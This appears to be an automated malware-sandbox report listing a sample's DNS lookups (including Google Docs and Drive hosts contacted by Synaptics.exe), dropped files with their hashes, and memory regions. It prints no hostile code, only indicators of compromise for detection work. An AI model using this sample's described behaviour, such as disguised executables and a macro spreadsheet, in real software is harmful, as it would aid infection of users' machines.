    252.215.42.69.in-addr.arpa
    dns
    144 B
    144 B
    2
    2

    DNS Request

    252.215.42.69.in-addr.arpa

    DNS Request

    252.215.42.69.in-addr.arpa

  • 8.8.8.8:53
    154.239.44.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    154.239.44.20.in-addr.arpa

  • 8.8.8.8:53
    31.73.42.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    31.73.42.20.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    107.12.20.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    107.12.20.2.in-addr.arpa

  • 8.8.8.8:53
    docs.google.com
    dns
    Synaptics.exe
    61 B
    77 B
    1
    1

    DNS Request

    docs.google.com

    DNS Response

    216.58.214.174

  • 8.8.8.8:53
    c.pki.goog
    dns
    Synaptics.exe
    56 B
    107 B
    1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.179.67

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    174.214.58.216.in-addr.arpa
    dns
    73 B
    173 B
    1
    1

    DNS Request

    174.214.58.216.in-addr.arpa

  • 8.8.8.8:53
    67.179.250.142.in-addr.arpa
    dns
    73 B
    111 B
    1
    1

    DNS Request

    67.179.250.142.in-addr.arpa

  • 8.8.8.8:53
    o.pki.goog
    dns
    Synaptics.exe
    56 B
    107 B
    1
    1

    DNS Request

    o.pki.goog

    DNS Response

    142.250.179.67

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    Synaptics.exe
    74 B
    90 B
    1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    142.250.74.225

  • 8.8.8.8:53
    225.74.250.142.in-addr.arpa
    dns
    73 B
    111 B
    1
    1

    DNS Request

    225.74.250.142.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Synaptics\Synaptics.exe

    Filesize

    829KB

    MD5

    e60d708e062dfc68d4110ad676a056d0

    SHA1

    e7116b561ebe31a1acecaddb49825b5385168aa3

    SHA256

    1780b674a95a4e57c241ea10150c7117db2bd6366c0515db354bcd52859654cc

    SHA512

    2bbefe5455815ac3b6776182437694e981d627d2addd46b3ac4b10ecbb37fcf2aa2261c5d7cb3be6756c7b17f134651ca9ee27595fd05ecbb1e5d00cf3cab167

  • C:\Users\Admin\AppData\Local\Temp\._cache_1780b674a95a4e57c241ea10150c7117db2bd6366c0515db354bcd52859654ccN.exe

    Filesize

    75KB

    MD5

    2f9366f62dcd6e73dc3520c65bbf95da

    SHA1

    792d846d45dee9d2f732b242c6f5c843fb27cb17

    SHA256

    bd848b8d9ab1a6dafea89c0fb7647dd68a8356634e378fc2bdf46f44e05f699f

    SHA512

    ee0ac811acbc031bd05442cf21eec537788e46763d6e8380f4a6b56abc6e6cd22868755d2b8bda3a1ed55545de1ecfa83e1ad2e66a13a30e314e5144ae8a257e

  • C:\Users\Admin\AppData\Local\Temp\z3sOGQio.xlsm

    Filesize

    17KB

    MD5

    8f3c7fbc1e051b36696dbd67e8ed4249

    SHA1

    b6b3e8ff0aecce4e85ca9819cce2c9cce7a14c67

    SHA256

    8a53a911752049160273f080c9631f519692de0aecd081b7b7c0239c5656f387

    SHA512

    4ecb5f18cee44ef986845c49b2aa84c115180e277b866c4ebf9ccda94c0992cb2d2f8c0123ad0fb5558f63e0b37d6547f5e5971832ee44c55edd44521dd950a5

  • memory/1968-74-0x0000000000400000-0x00000000004D5000-memory.dmp

    Filesize

    852KB

  • memory/1968-0-0x0000000002260000-0x0000000002261000-memory.dmp

    Filesize

    4KB

  • memory/2084-75-0x0000000000680000-0x0000000000681000-memory.dmp

    Filesize

    4KB

  • memory/2084-125-0x0000000000400000-0x00000000004D5000-memory.dmp

    Filesize

    852KB

  • memory/2084-126-0x0000000000680000-0x0000000000681000-memory.dmp

    Filesize

    4KB

  • memory/2084-157-0x0000000000400000-0x00000000004D5000-memory.dmp

    Filesize

    852KB

  • memory/3860-110-0x00007FFA27450000-0x00007FFA27460000-memory.dmp

    Filesize

    64KB

  • memory/3860-111-0x00007FFA27450000-0x00007FFA27460000-memory.dmp

    Filesize

    64KB

  • memory/3860-112-0x00007FFA27450000-0x00007FFA27460000-memory.dmp

    Filesize

    64KB

  • memory/3860-113-0x00007FFA27450000-0x00007FFA27460000-memory.dmp

    Filesize

    64KB

  • memory/3860-114-0x00007FFA251F0000-0x00007FFA25200000-memory.dmp

    Filesize

    64KB

  • memory/3860-115-0x00007FFA251F0000-0x00007FFA25200000-memory.dmp

    Filesize

    64KB

  • memory/3860-109-0x00007FFA27450000-0x00007FFA27460000-memory.dmp

    Filesize

    64KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.